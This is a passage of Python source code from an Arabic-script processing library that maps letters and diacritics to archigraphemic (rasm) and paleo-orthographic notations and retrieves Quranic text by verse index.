'ﺑ' : 'ٮ₁' ,
'ﺒ' : 'ٮ₁' ,
'ﭖ' : 'ٮ₃' ,
'ﭗ' : 'ٮ₃' ,
'ﭘ' : 'ٮ₃' ,
'ﭙ' : 'ٮ₃' ,
'ﺕ' : 'ٮ²' ,
'ﺖ' : 'ٮ²' ,
'ﺗ' : 'ٮ²' ,
'ﺘ' : 'ٮ²' ,
'ﺙ' : 'ٮ³' ,
'ﺚ' : 'ٮ³' ,
'ﺛ' : 'ٮ³' ,
'ﺜ' : 'ٮ³' ,
'ࢬ' : 'ٮ₂' ,
'ݕ' : 'ٮ‸' ,
'ࢠ' : 'ٮᵥ' ,
'ٹ' : 'ٮᵀ' ,
'ݖ' : 'ٮᵛ' ,
'ټ' : 'ٮₒ' ,
'خ' : 'ح¹' ,
'ج' : 'ح₁' ,
'چ' : 'ح₃' ,
'ڃ' : 'ح₂' ,
'ڄ' : 'ح₂' ,
'چ' : 'ح₃' ,
'ڇ' : 'ح₄' ,
'ݘ' : 'ح₃' ,
'ڿ' : 'ح¹₃' ,
'ڂ' : 'ح²' ,
'ݗ' : 'ح²' ,
'ࢢ' : 'ح₂' , # U+08a2 ARABIC LETTER JEEM WITH TWO DOTS ABOVE
'څ' : 'ح³' ,
'ﺝ' : 'ح₁' ,
'ﺞ' : 'ح₁' ,
'ﺟ' : 'ح₁' ,
'ﺠ' : 'ح₁' ,
'ﺥ' : 'ح¹' ,
'ﺦ' : 'ح¹' ,
'ﺧ' : 'ح¹' ,
'ﺨ' : 'ح¹' ,
'ﭺ' : 'ح₃' ,
'ﭻ' : 'ح₃' ,
'ﭼ' : 'ح₃' ,
'ﭽ' : 'ح₃' ,
'ځ' : 'حˀ' ,
'ݮ' : 'حт' ,
'ݼ' : 'ح۴' ,
'ݯ' : 'حт₂' ,
'ݲ' : 'حᵀ' ,
'ز' : 'ر¹' ,
'ڔ' : 'ر₁' ,
'ݬ' : 'رˀ' ,
'ږ' : 'ر¹₁' ,
'ڗ' : 'ر²' ,
'ݫ' : 'ر²' ,
'ژ' : 'ر³' ,
'ڙ' : 'ر⁴' ,
'ﺯ' : 'ر¹' ,
'ﺰ' : 'ر¹' ,
'ﮊ' : 'ر³' ,
'ﮋ' : 'ر³' ,
'ړ' : 'رₒ' ,
'ݛ' : 'ر₋' ,
'ࢪ': 'ر' , # U+08aa ARABIC LETTER REH WITH LOOP
'ڕ' : 'رᵥ' ,
'ڑ' : 'رᵀ' ,
'ڒ' : 'رᵛ' ,
'ۯ' : 'رᶺ' ,
'ݱ' : 'رᵀ²' ,
'ذ' : 'د¹' ,
'ڊ' : 'د₁' ,
'ڍ' : 'د₂' ,
'ڌ' : 'د²' ,
'ڎ' : 'د³' ,
'ڏ' : 'د³' ,
'ڐ' : 'د⁴' ,
'ﺫ' : 'د¹' ,
'ﺬ' : 'د¹' ,
'ڈ' : 'دᵀ' ,
'ډ' : 'دₒ' ,
'ݚ' : 'د‸' ,
'ۮ' : 'دᶺ' ,
'ڋ' : 'دᵀ₁' ,
'ݙ' : 'دᵀ₂' ,
'ظ' : 'ط¹' ,
'ࢣ' : 'ط²' , # U+08a3 ARABIC LETTER TAH WITH TWO DOTS ABOVE
'ڟ' : 'ط³' ,
'ﻅ' : 'ط¹' ,
'ﻆ' : 'ط¹' ,
'ﻇ' : 'ط¹' ,
'ﻈ' : 'ط¹' ,
'ض' : 'ص¹' ,
'ڝ' : 'ص₂' ,
'ۻ' : 'ص¹₁' ,
'ڞ' : 'ص³' ,
'ﺽ' : 'ص¹' ,
'ﺾ' : 'ص¹' ,
'ﺿ' : 'ص¹' ,
'ﻀ' : 'ص¹' ,
'ش' : 'س³' ,
'ڛ' : 'س₃' ,
'ښ' : 'س¹₁' ,
'ݭ' : 'س²' ,
'ݜ' : 'س³' ,
'ۺ' : 'س³₁' ,
'ڜ' : 'س³₃' ,
'ﺵ' : 'س³' ,
'ﺶ' : 'س³' ,
'ﺷ' : 'س³' ,
'ﺸ' : 'س³' ,
'ݽ' : 'س۴' ,
'ݾ' : 'سᶺ' ,
'ݰ' : 'سᵀ²' ,
'ف' : 'ڡ¹' ,
'ﻑ' : 'ڡ¹' ,
'ﻒ' : 'ڡ¹' ,
'ڢ' : 'ڡ₁' ,
'ݠ' : 'ڡ₂' ,
'ڥ' : 'ڡ₃' ,
'ݡ' : 'ڡ₃' ,
'ڣ' : 'ڡ¹₁' ,
'ڤ' : 'ڡ³' ,
'ڦ' : 'ڡ⁴' ,
'ࢤ' : 'ڡ³₁' , # U+08a4 ARABIC LETTER FEH WITH DOT BELOW AND THREE DOTS ABOVE
'ﻓ' : 'ڡ¹' ,
'ﻔ' : 'ڡ¹' ,
'ﻗ' : 'ڡ²' ,
'ﻘ' : 'ڡ²' ,
'غ' : 'ع¹' ,
'ۼ' : 'ع¹₁' ,
'ݝ' : 'ع²' ,
'ݟ' : 'ع²' ,
'ڠ' : 'ع³' ,
'ݞ' : 'ع³' ,
'ﻍ' : 'ع¹' ,
'ﻎ' : 'ع¹' ,
'ﻏ' : 'ع¹' ,
'ﻐ' : 'ع¹' ,
'ؤ' : 'وˀ' ,
'ۏ' : 'و¹' ,
'ۊ' : 'و²' ,
'ۋ' : 'و³' ,
'ﺅ' : 'وˀ' ,
'ﺆ' : 'وˀ' ,
'ۄ' : 'وₒ' , #FIXME
'ۅ' : 'و₋' , #FIXME
'ࢫ' : 'وₒ' , # U+08ab ARABIC LETTER WAW WITH DOT WITHIN #FIXME
'ۆ' : 'وᵛ' ,
'ۇ' : 'وᵠ' , #FIXME
'ۈ' : 'و।' , #FIXME
'ۉ' : 'وᶺ' ,
'ݸ' : 'و۲' ,
'ݹ' : 'و۳' ,
'ۀ' : 'هˀ' ,
'ۂ' : 'هˀ' ,
'ة' : 'ه²' ,
'ۃ' : 'ه²' ,
'ﮤ' : 'هˀ' ,
'ﮥ' : 'هˀ' ,
'ﺓ' : 'ه²' ,
'ﺔ' : 'ه²' ,
'ۿ' : 'هᶺ' ,
'ݦ' : 'م₁' ,
'ݥ' : 'م¹' ,
'ࢧ' : 'م³' , # U+08a7 ARABIC LETTER MEEM WITH THREE DOTS ABOVE
'ڸ' : 'ل₃' ,
'ڶ' : 'ل¹' ,
'ڷ' : 'ل³' ,
'ݪ' : 'ل₋' ,
'ڵ' : 'لᵛ' ,
'ؼ' : 'ك₃' ,
'ڮ' : 'ك₃' ,
'ݤ' : 'ك₃' ,
'ݢ' : 'ك¹' ,
'ػ' : 'ك²' ,
'ݿ' : 'ك²ˀ' ,
'ڭ' : 'ك³' ,
'ݣ' : 'ك³' ,
'ګ' : 'ك' , # FIXME
'ڰ' : 'كᐟ' , #FIXME
'ڲ' : 'كᐟ₂' ,
'ڳ' : 'كᐟ₂' ,
'ڱ' : 'ك²ᐟ' ,
'ڴ' : 'ك³ᐟ' ,
'گ' : 'كᐟ' ,
'ﮓ' : 'كᐟ' ,
'ﮔ' : 'كᐟ' ,
'ﮕ' : 'كᐟ' ,
'َ' : 'ᵃ' , # fatha
'ً' : 'ᵃⁿ' , # fathatan
'ࣰ' : 'ᵃᵃ' , # open fathatan
'ُ' : 'ᵘ' , # damma
'ٌ' : 'ᵘⁿ' , # dammatan
'ࣱ' : 'ᵘᵘ' , # open dammatan
'ِ' : 'ᵢ' , # kasra
'ٍ' : 'ᵢₙ' , # kasratan
'ࣲ' : 'ᵢᵢ' , # open kasratan
'ّ' : 'ᵚ' , # sadda
'ۡ' : 'ᵒ' , # quranic sukun
'ْ' : 'ᵒ' , # normal sukun
'ٓ' : '˜' , # madda
'ۨ' : 'ᴺ' , # minuature nun above
'ٰ' : 'ᴬ' , # dagger alif
'ۜ' : 'ˢ' , # miniature sin above
'ۣ' : 'ₛ' , # miniature sin below
'ۢ' : 'ᵐ' , # minuature mim above #FIXME Mᴹᴍ Yyʏ
'ۭ' : 'ₘ' , # # minuature mim below
'ۥ' : 'ʷ' , # minuature waw
'ۦ' : 'ʸ' , # miniature ya
'ۧ' : 'ʸ' , # minuature ya above
'۟' : '°' , # U+06df ARABIC SMALL HIGH ROUNDED ZERO - small circle | U+00B0 DEGREE SIGN
# the letter is additional and should not be pronounced either in connection nor pause
'۠' : '⁰' , # U+06e0 ARABIC SMALL HIGH UPRIGHT RECTANGULAR ZERO - oval sign
# above an alif followed by a vowel letter, indicates that it is additional in consecutive reading
# but should be pronounced in pause
'۫' : '⌃' , # U+06eb ARABIC EMPTY CENTRE HIGH STOP | U+2303 (alt-08963) UP ARROWHEAD ; hapax تَأۡمَ۫نَّا
'۪' : '⌄' , # U+06ea ARABIC EMPTY CENTRE LOW STOP | U+2304 DOWN ARROWHEAD ; hapax مَجۡر۪ىٰهَا
'۬' : '•' , # U+06ec ARABIC ROUNDED HIGH STOP WITH FILLED CENTRE | U+2022 BULLET ; hapax ءَا۬عۡجَمِىࣱّ
'ٔ' : 'ˀ' , # hamza above
'ٕ' : 'ɂ' , # hamza below
#'ـٔ ' : 'ˀ' , # U+0640 "ـ" tatweel is ALWAYS followed by hamza above, eg. ٱلۡأَفۡـِٔدَةِ 104:7:4,601:49,821:8:4
# pausal marks
'ۖ' : '⒮', # U+06d6 ARABIC SMALL HIGH LIGATURE SAD WITH LAM WITH ALEF MAKSURA
'ۗ' : '⒬', # U+06d7 ARABIC SMALL HIGH LIGATURE QAF WITH LAM WITH ALEF MAKSURA
'ۘ' : '⒨', # U+06d8 ARABIC SMALL HIGH MEEM INITIAL FORM
'ۙ' : '⒧', # U+06d9 ARABIC SMALL HIGH LAM ALEF
'ۚ' : '⒥', # U+06da ARABIC SMALL HIGH JEEM
'ۛ' : '∴', # U+06db ARABIC SMALL HIGH THREE DOTS
}
CLUSTERS_REGEX = re.compile('|'.join(CLUSTERS))
CLEAN_REGEX = re.compile(fr'[^{CHAR}]')
RASM_QNY_REGEX = re.compile(fr'({"|".join(RASM_QNY_MAPPING)})$')
RASM_REGEX = re.compile(fr'[{"".join(RASM_MAPPING)}]')
ABJAD_REGEX = re.compile('|'.join(ABJAD_MAPPING))
PALEO_REGEX = re.compile('|'.join(PALEO_MAPPING))
PALEO_N_REGEX = re.compile(fr'[ںنڻڼڹݧݨݩڽﻥﻦ](?=[^{CHAR}]*$)')
PALEO_Q_REGEX = re.compile(fr'[ٯࢥڧقڨﻕﻖ](?=[^{CHAR}N]*$)')
PALEO_Y_REGEX = re.compile(fr'[ىیۍݷيېۑؠئؽێݵݶࢨࢩؾؿےۓݺݻﻯﻰﮮﮯﯼﯽﻲﮰﮱﺉﺊ](?=[^{CHAR}NQ]*$)')
CREAN_RASM_REGEX = re.compile(r'[^A-Y ]')
# separate blocks in archigraphemic representation
ARDW_REGEX = re.compile(r'([ARDW][^QNYABGRDTCSFEWHMLK]*)')
# separate blocks in arabic graphemic representation
ARDW_AR = ''.join((A, R, D, W))
BLOCKS_REGEX = re.compile(rf'((?:[{ARDW_AR}]|.+?[{ARDW_AR}])[^{CHAR}]*|.+)')
UNSTABLE_ALIF_REGEX = re.compile(r'ᵃA(?=.)')
UNSTABLE_ALIF_ARA_REGEX = re.compile(r'َا(?=.)')
def _to_paleo(tokens, /, unstable_alif=False):
""" Convert Arabic-scriped token into paleo-orthographic representation and create copy in rasm representation.
Args:
tokens (iterator): stream to convert.
unstable_alif (bool): if True, delete fatha+alif in conversion.
Yield:
str, str, str: original token, token in paleo-prthographic representation,rasmired token in Latin, rasmired token in Arabic.
"""
for tok in tokens:
pal = tok
# convert to paleo general
pal = DATA.PALEO_REGEX.sub(lambda m: DATA.PALEO_MAPPING[m.group(0)], pal)
# restore consonantal diacritics for ya when appropriate
pal = re.sub(f'[یى](?=[^ا-ی]*[ا-ی])(?!₂|ɂ|ˀ|ᴬ)', 'ی₂', pal)
# convert to paleo NQY
pal = DATA.PALEO_N_REGEX.sub('N', pal)
pal = DATA.PALEO_Q_REGEX.sub('Q', pal)
pal = DATA.PALEO_Y_REGEX.sub('Y', pal)
# convert graphemes to rasm
pal = DATA.RASM_REGEX.sub(lambda m: DATA.RASM_MAPPING[m.group(0)], pal)
if unstable_alif:
pal = DATA.UNSTABLE_ALIF_REGEX.sub('', pal)
pal = DATA.ARDW_REGEX.sub(r'\1 ', pal)
# make copy with only archigraphemes
rlt = DATA.CREAN_RASM_REGEX.sub('', pal)
rar = DATA.ABJAD_REGEX.sub(lambda m: ABJAD_MAPPING[m.group(0)], rlt)
yield tok, rlt, rar, pal
def _tokenise(stream, /, norm_clusters=False):
""" Segment stream in tokens.
Args:
stream (iterator): text to split.
norm_clusters (bool): normalise clusters before tokenising.
Yield:
str: splitted token.
"""
if norm_clusters:
stream = (DATA.CLUSTERS_REGEX.sub(lambda m: DATA.CLUSTERS[m.group(0)], line) for line in stream)
yield from (tok for line in stream for tok in re.split(rf'[{whitespace}{punctuation}؟،؛]', line) if tok)
def _clean(tokens, /, unstable_alif=False):
""" Create a copy each token in tokens containing no Arabic-scripted characters.
Args:
tokens (iterator): tokens to clean.
unstable_alif (bool): if True, delete fatha+alif in conversion.
Yield:
str, str: original token, cleaned token. Nothing if clean token is empty.
"""
if unstable_alif:
tokens = (DATA.UNSTABLE_ALIF_ARA_REGEX.sub('', tok) for tok in tokens)
yield from ((ori, DATA.CLEAN_REGEX.sub('', ori)) for ori in tokens)
def _to_rasm(tokens):
""" Convert cleantok to archigraphemic representation.
Args:
tokens (iterator): stream to convert.
Yield:
str, str, str: original token, rasmired token in Latin, rasmired token in Arabic.
"""
tokens_qny = ((ori, DATA.RASM_QNY_REGEX.sub(lambda m: DATA.RASM_QNY_MAPPING[m.group(0)], clean)) for ori, clean in tokens)
tokens_rasm = ((ori, DATA.RASM_REGEX.sub(lambda m: DATA.RASM_MAPPING[m.group(0)], rasm)) for ori, rasm in tokens_qny)
tokens_rblocks = ((ori, re.sub(r'([ARDW])', r'\1 ', rasm)) for ori, rasm in tokens_rasm)
yield from ((ori, rasm, DATA.ABJAD_REGEX.sub(lambda m: ABJAD_MAPPING[m.group(0)], rasm)) for ori, rasm in tokens_rblocks)
def _uniq(stream, /, paleo=False):
""" Map each rasm block with the list of blocks or tokens they appear in
and calculate number of occurrences.
Args:
stream (iterator): sequence of Arabic token, rasm in Latin script, rasm in Arabic script and
paleo-orthphraphic representation (optional).
paleo (bool): includes paleo-orthographic representation.
Yield:
str, int, set: block in Latin script, block in Arabic script, number of occurrences, tokens where
block appears or 2-item tuples containing ori token and paleo-orthographic representation.
"""
if paleo:
blocks = sorted(((*bl, pal, ori) for ori, *rsm, pal in stream for bl in zip(*(c.split() for c in rsm))), key=lambda x: x[0])
groups = ((k, [(ori, pal) for *_, pal, ori in gr]) for k, gr in groupby(blocks, key=lambda x : (x[:2])))
else:
blocks = sorted(((*bl, ori) for ori, *rsm in stream for bl in zip(*(c.split() for c in rsm))), key=lambda x: x[0])
groups = ((k, [ori for *_, ori in gr]) for k, gr in groupby(blocks, key=lambda x : (x[:2])))
yield from sorted(((*block, len(gr), set(gr)) for block, gr in groups), key=lambda x: x[2], reverse=True)
def _get_blocks(index, source='tanzil-simple', only_rasm=False):
""" Get sequence of Quran blocks from Quran index range.
Args:
index (tuple): Quran index range of text to retrieve as archigraphemes.
Format of the index: ((i, j, k, m), (n, p, q, r)). All integers can be None except i.
source ("tanzil-simple", "tanzil-uthmani", "decotype"): indicate the text source from which to retrieve the results.
If the source is different from the three indicated above, tanzil-simple will be used.
only_rasm (bool): do not print start of rub el hizb (۞ U+06de) nor place of sajda (۩ U+06e9) in output.
unstable_alif (bool): if True, delete fatha+alif in conversion.
Yield:
tuple: (original_token, rarm_latin, rarm_arabic, paleo), (sura_page, vers_line, word, block)
Raise:
IndexError: when Quran index is out of range.
PrivateFileError: decotype file is private.
"""
if source == 'tanzil-uthmani':
source_file = SOURCE.TANZIL_UTHMANI
elif source == 'decotype':
source_file = SOURCE.DECOTYPE
else:
source_file = SOURCE.TANZIL_SIMPLE
source_path = files('rasm_arch_data').joinpath(source_file)
if source == 'decotype' and not source_path.exists():
raise PrivateFileError
with source_path.open() as fp:
quran = json.load(fp)
i, j, k, m = [(ind-1 if ind else ind) for ind in index[0]]
n, p, q, r = [(ind-1 if ind else ind) for ind in index[1]]
# we put a maximum upper limit in the end index, copying the start index when the end is absent
if (n, p, q, r) == (None, None, None, None):
n, p, q, r = i, j, k, m
for isura in range(i, len(quran['ind'])):
if n != None:
if isura > n:
return
else:
if isura > i:
return
for ivers in range(len(quran['ind'][isura])):
if j != None and isura == i and ivers < j:
continue
if p != None and isura == n and ivers > p:
return
for iword in range(len(quran['ind'][isura][ivers])):
if k != None and isura == i and ivers == j and iword < k:
continue
if q != None and isura == n and ivers == p and iword > q:
return
for iblock in range(len(quran['ind'][isura][ivers][iword])):
if m != None and isura == i and ivers == j and iword == k and iblock < m:
continue
if r != None and isura == n and ivers == p and iword == q and iblock > r:
return
block = quran['ind'][isura][ivers][iword][iblock]
tok, pal = quran['tok'][block]
rlt = DATA.CREAN_RASM_REGEX.sub('', pal)
rar = DATA.ABJAD_REGEX.sub(lambda m: ABJAD_MAPPING[m.group(0)], rlt)
if not only_rasm or tok not in ('۞', '۩'):
yield (tok, rlt, rar, pal), (isura+1, ivers+1, iword+1, iblock+1)
@singledispatch
def rasm_arch(input_):
raise NotImplementedError('Unsupported type')
@rasm_arch.register(TextIOBase)
def _(input_, /, paleo=False, blocks=False, uniq=False, norm_clusters=False, unstable_alif=False):
""" Clean, tokenise and convert text to archigraphemic representation.
+----------------+ +-----------+ +--------+ +----------+
input --> | _norm_clusters | --> | _tokenise | --> | _clean | --> | _to_rasm | ----+---> output
| +----------------+ +-----------+ +--------+ +----------+ |
| | | +------+
+------------------------------+ +--> | uniq |
| +------+
| +-----------+ |
+--------------------> | _to_paleo | -----+
+-----------+
Args:
input_ (io.TextIOBase): text to convert to archigraphemes, e.g.
"كبيكج وكيتكج والجِنّ"
paleo (bool): convert to paleo-orthographic representation instead of bare rasm.
blocks (bool): yield results in letterblocks, not words (irrelevant if uniq == True).
uniq (bool): if True, map letterblocks with list of tokens the appear and show absolute frequency.
norm_clusters (bool): if True, normalise Arabic clusters to decomposed form before conversion.
unstable_alif (bool): if True, delete fatha+alif in conversion.
Yield:
(if uniq==False and blocks==False and paleo==False)
str, str, str: original word, rasmised word in Latin, rasmised word in Arabic, e.g.
("كبيكج", "KBBKG", "کٮٮکح")
("وكيتكج", "WKBBKG", "وکٮٮکح")
("والجِنّ", "WALGN", "والحں")
Yield:
(if uniq==False and blocks==False and paleo==True)
str, str, str, str: original word, rasmised word in Latin, rasmised word in Arabic, paleo-orthographic representaiton of word, e.g.
("كبيكج", "KBBKG", "كٮٮكح", "KB₁B₂KG₁")
("وكيتكج", "WKBBKG", "وكٮٮكح", "WKB₂B²KG₁")
("والجِنّ", "WALGN", "والحں", "WALG₁ᵢN¹ᵚ")
Yield:
(if uniq==False and blocks==True and paleo==False)
str, list: original word, list of 2-item sets of block in Latin and block in Arabic, e.g.
("كبيكج", [("كبيكج", "KBBKG", "کٮٮکح")])
("وكيتكج", [("و", "W", "و"), ("كيتكج", "KBBKG", "کٮٮکح")])
("والجِنّ", [("و", "W", "و"), ("ا", "A", "ا"), ("لجِنّ", "LGN", "لحں")])
Yield:
(if uniq==False and blocks==True and paleo==True)
str, list: original word, list of 3-item sets of block in Latin, block in Arabic, paleo-orthographic representaiton of block, e.g.
("كبيكج", [("كبيكج", "KBBKG", "كٮٮكح", "KB₁B₂KG₁")]),
("وكيتكج", [("و", "W", "و", "W"), ("كيتكج", "KBBKG", "كٮٮكح", "KB₂B²KG₁")]),
("والجِنّ", [("و", "W", "و", "W"), ("ا", "A", "ا", "A"), ("لجِنّ", "LGN", "لحں", "LG₁ᵢN¹ᵚ")])
Yield:
(if uniq==True and paleo==False ; blocks irrelevant)
str, str, int, set: original block, rasmised block in Latin, rasmised block in Arabic, total occurrences of blocks, list of unique types where it appears, e.g.
("KBBKG", "کٮٮکح", 2, {"كبيكج", "وكيتكج"})
("W", "و", 2, {"وكيتكج", "والجِنّ"})
("A", "ا", 1, {"والجِنّ"})
("LGN", "لحں", 1, {"والجِنّ"})
Yield:
(if uniq==True and paleo==True ; blocks irrelevant)
str, str, int, set: original block, rasmised block in Latin, rasmised block in Arabic, total occurrences of blocks, list of unique types where it appears, e.g.
("KBBKG", "كٮٮكح", 2, {("كبيكج", "KB₁B₂KG₁"), ("وكيتكج", "WKB₂B²KG₁")}),
("W", "و", 2, {("وكيتكج", "WKB₂B²KG₁"), ("والجِنّ", "WALG₁ᵢN¹ᵚ")}),
("A", "ا", 1, {("والجِنّ", "WALG₁ᵢN¹ᵚ")}),
("LGN", "لحں", 1, {("والجِنّ", "WALG₁ᵢN¹ᵚ")})
"""
if uniq and blocks:
blocks = False
procs = partial(_tokenise, norm_clusters=norm_clusters),
if paleo:
# normalise tanwin
input_ = (DATA.NORM_REGEX.sub(lambda m: DATA.NORM_MAPPING[m.group(0)], s) for s in input_)
procs += partial(_to_paleo, unstable_alif=unstable_alif),
else:
procs += partial(_clean, unstable_alif=unstable_alif), _to_rasm
if uniq:
procs += partial(_uniq, paleo=paleo),
results = pipe(input_, *procs)
if blocks:
for ori, *rest in results:
yield ori, list(zip(DATA.BLOCKS_REGEX.findall(ori), *(r.split() for r in rest)))
else:
if uniq:
if paleo:
yield from ((*fst, {(word, pal.replace(' ', '')) for word, pal in found}) for *fst, found in results)
else:
yield from ((ori, *rest) for ori, *rest in results)
else:
yield from ((ori, *(r.replace(' ', '') for r in rest)) for ori, *rest in results)
@rasm_arch.register(tuple)
def _(input_, /, paleo=True, blocks=False, uniq=False, source='tanzil-simple', only_rasm=False):
""" Retrieve quranic text in archegraphemic representation according to index range.
Args:
text (tuple): Quran index range of text to retrieve as archigraphemes. Format of the index:
((i, j, k, m), (n, p, q, r)). All integers can be None except i. E.g.
(28, 98, 1, None), (28, 98, 8, None)
paleo (bool): convert to paleo-orthographic representation instead of bare rasm.
blocks (bool): yield results in letterblocks, not words (irrelevant if uniq == True).
uniq (bool): if True, map letterblocks with list of tokens the appear and show absolute frequency.
source ("tanzil-simple", "tanzil-uthmani", "decotype"): indicate the text source from which to retrieve the results.
If the source is different from the three indicated above, tanzil-simple will be used.
unstable_alif (bool): if True, ignore alifs in rasm conversion.
only_rasm (bool): do not print start of rub el hizb (۞ U+06de) nor place of sajda (۩ U+06e9) in output.
Yield:
(if uniq==False and blocks==False and paleo==False)
str, str, str, (int, int, int): original word, rasmised word in Latin, rasmised word in Arabic, Quran index e.g.
("إِنَّمَآ", "ABMA", "اٮما", (20, 98, 1))
("إِلَٰهُكُمُ", "ALHKM", "الهکم", (20, 98, 2))
("ٱللَّهُ", "ALLH", "الله", (20, 98, 3))
("ٱلَّذِی", "ALDY", "الد ی", (20, 98, 4))
("لَآ", "LA", "لا", "LᵃA˜", (20, 98, 5))
("إِلَٰهَ", "ALH", "اله", (20, 98, 6))
("إِلَّا", "ALA", "الا", (20, 98, 7))
("هُوَۚ", "HW", "هو", "HᵘWᵃ⒥", (20, 98, 8))
Yield:
(if uniq==False and blocks==False and paleo==True)
str, str, str, str, (int, int, int): original word, rasmised word in Latin, rasmised word in Arabic, paleo-orthographic representation of word, Quran index e.g.
("إِنَّمَآ", "ABMA", "اٮما", "AɂᵢB’ᵚᵃMᵃA˜", (20, 98, 1))
("إِلَٰهُكُمُ", "ALHKM", "الهکم", "AɂᵢLᵃᴬHᵘKᵘMᵘ", (20, 98, 2))
("ٱللَّهُ", "ALLH", "الله", "ALLᵚᵃHᵘ", (20, 98, 3))
("ٱلَّذِی", "ALDY", "الدی", "AᵟLᵚᵃD’ᵢY", (20, 98, 4))
("لَآ", "LA", "لا", "LᵃA˜", (20, 98, 5))
("إِلَٰهَ", "ALH", "اله", "Aɂᵢ LᵃᴬHᵃ", (20, 98, 6))
("إِلَّا", "ALA", "الا", "Aɂᵢ LᵚᵃA", (20, 98, 7))
("هُوَۚ", "HW", "هو", "HᵘWᵃ⒥", (20, 98, 8))
Yield:
(if uniq==False and blocks==True and paleo==True)
str, list: original word, list of of blocks in Latin transcription, Arabic script, paleo-orthographic representation and Quranic index, e.g.
("إِنَّمَآ", [("إِ", "A", "ا", "Aɂᵢ", (20, 98, 1, 1)), ("نَّمَآ", "BMA", "ٮما", "B’ᵚᵃMᵃA˜", (20, 98, 1, 2))])
("إِلَٰهُكُمُ", [("إِ", "A", "ا", "Aɂᵢ", (20, 98, 2, 1)), ("لَٰهُكُمُ", "LHKM", "لهکم", "LᵃᴬHᵘKᵘMᵘ", (20, 98, 2, 2))])
("ٱللَّهُ", [("ٱ", "A", "ا", "A", (20, 98, 3, 1)), ("للَّهُ", "LLH", "لله", "LLᵚᵃHᵘ", (20, 98, 3, 2))])
("ٱلَّذِی", [("ٱ", "A", "ا", "Aᵟ", (20, 98, 4, 1)), ("لَّذِ", "LD", "لد", "LᵚᵃD’ᵢ", (20, 98, 4, 2)), ("ی", "Y", "ی", "Y", (20, 98, 4, 3))])
("لَآ", [("لَآ", "LA", "لا", "LᵃA˜", (20, 98, 5, 1))])
("إِلَٰهَ", [("إِ", "A", "ا", "Aɂᵢ", (20, 98, 6, 1)), ("لَٰهَ", "LH", "له", "LᵃᴬHᵃ", (20, 98, 6, 2))])
("إِلَّا", [("إِ", "A", "ا", "Aɂᵢ", (20, 98, 7, 1)), ("لَّا", "LA", "لا", "LᵚᵃA", (20, 98, 7, 2))])
("هُوَۚ", [("هُوَۚ", "HW", "هو", "HᵘWᵃ⒥", (20, 98, 8, 1))])
Yield:
(if uniq==False and blocks==True and paleo==False)
str, list: original word, list of of blocks in Latin transcription, Arabic script and Quranic index, e.g.
("إِنَّمَآ", [("إِ", "A", "ا", (20, 98, 1, 1)), ("نَّمَآ", "BMA", "ٮما", (20, 98, 1, 2))])
("إِلَٰهُكُمُ", [("إِ", "A", "ا", (20, 98, 2, 1)), ("لَٰهُكُمُ", "LHKM", "لهکم", (20, 98, 2, 2))])
("ٱللَّهُ", [("ٱ", "A", "ا", (20, 98, 3, 1)), ("للَّهُ", "LLH", "لله", (20, 98, 3, 2))])
("ٱلَّذِی", [("ٱ", "A", "ا", (20, 98, 4, 1)), ("لَّذِ", "LD", "لد", (20, 98, 4, 2)), ("ی", "Y", "ی", (20, 98, 4, 3))])
("لَآ", [("لَآ", "LA", "لا", (20, 98, 5, 1))])
("إِلَٰهَ", [("إِ", "A", "ا", (20, 98, 6, 1)), ("لَٰهَ", "LH", "له", (20, 98, 6, 2))])
("إِلَّا", [("إِ", "A", "ا", (20, 98, 7, 1)), ("لَّا", "LA", "لا", (20, 98, 7, 2))])
("هُوَۚ", [("هُوَۚ", "HW", "هو", "HᵘWᵃ⒥", (20, 98, 8, 1))])
Yield:
(if uniq==True and paleo==False ; blocks is irrelevant)
str, str, int, set: rasmised block in Latin, rasmised block in Arabic, total occurrences of block, list of unique types where it appears, e.g.
("A", "ا", 6, {"إِلَّا", "ٱلَّذِی", "إِنَّمَآ", "إِلَٰهَ", "إِلَٰهُكُمُ", "ٱللَّهُ"})
("LA", "لا", 2, {"إِلَّا", "لَآ"})
("BMA", "ٮما", 1, {"إِنَّمَآ"})
("HW", "هو", 1, {"هُوَۚ"})
("LD", "لد", 1, {"ٱلَّذِی"})
("LH", "له", 1, {"إِلَٰهَ"})
("LHKM", "لهکم", 1, {"إِلَٰهُكُمُ"})
("LLH", "لله", 1, {"ٱللَّهُ"})
("Y", "ی", 1, {"ٱلَّذِی"})
Yield:
(if uniq==True and paleo==False ; blocks is irrelevant)
str, str, int, set: rasmised block in Latin, rasmised block in Arabic, total occurrences of block, list of unique types where it appears, e.g.
("A", "ا", 6, {("إِلَّا", "Aɂᵢ LᵚᵃA"), ("ٱلَّذِی", "Aᵟ LᵚᵃD’ᵢ Y"), ("إِنَّمَآ", "Aɂᵢ B’ᵚᵃMᵃA˜"), ("إِلَٰهَ", "Aɂᵢ LᵃᴬHᵃ"), ("إِلَٰهُكُمُ", "Aɂᵢ LᵃᴬHᵘKᵘMᵘ"), ("ٱللَّهُ", "A LLᵚᵃHᵘ")})
("LA", "لا", 2, {("إِلَّا", "Aɂᵢ LᵚᵃA"), ("لَآ", "LᵃA˜")})
("BMA", "ٮما", 1, {("إِنَّمَآ", "Aɂᵢ B’ᵚᵃMᵃA˜")})
("HW", "هو", 1, {("هُوَۚ", "HᵘWᵃ⒥")})
("LD", "لد", 1, {("ٱلَّذِی", "Aᵟ LᵚᵃD’ᵢ Y")})
("LH", "له", 1, {("إِلَٰهَ", "Aɂᵢ LᵃᴬHᵃ")})
("LHKM", "لهکم", 1, {("إِلَٰهُكُمُ", "Aɂᵢ LᵃᴬHᵘKᵘMᵘ")})
("LLH", "لله", 1, {("ٱللَّهُ", "A LLᵚᵃHᵘ")})
("Y", "ی", 1, {("ٱلَّذِی", "Aᵟ LᵚᵃD’ᵢ Y")})
Raise:
IndexError: Quran index out of range.
PrivateFileError: decotype file is private.
"""
if uniq and blocks:
blocks = False
try:
blocks_quran = _get_blocks(input_, source, only_rasm)
# group blocks into words
blocks_gr = (list(gr) for _, gr in groupby(blocks_quran, key=lambda x: (x[1][1], x[1][2])))
if not blocks:
if uniq:
if paleo:
yield from _uniq(((''.join(g[0][0] for g in b), ' '.join(g[0][1] for g in b),
' '.join(g[0][2] for g in b), ''.join(g[0][3] for g in b)) for b in blocks_gr), paleo=paleo)
else:
yield from _uniq(((''.join(g[0][0] for g in b), ' '.join(g[0][1] for g in b), ' '.join(g[0][2] for g in b)) for b in blocks_gr))
elif paleo:
yield from ((''.join(g[0][0] for g in b), ''.join(g[0][1] for g in b), ''.join(g[0][2] for g in b),
''.join(g[0][3] for g in b), b[0][1][:-1]) for b in blocks_gr)
# blocks==False, paleo==True
else:
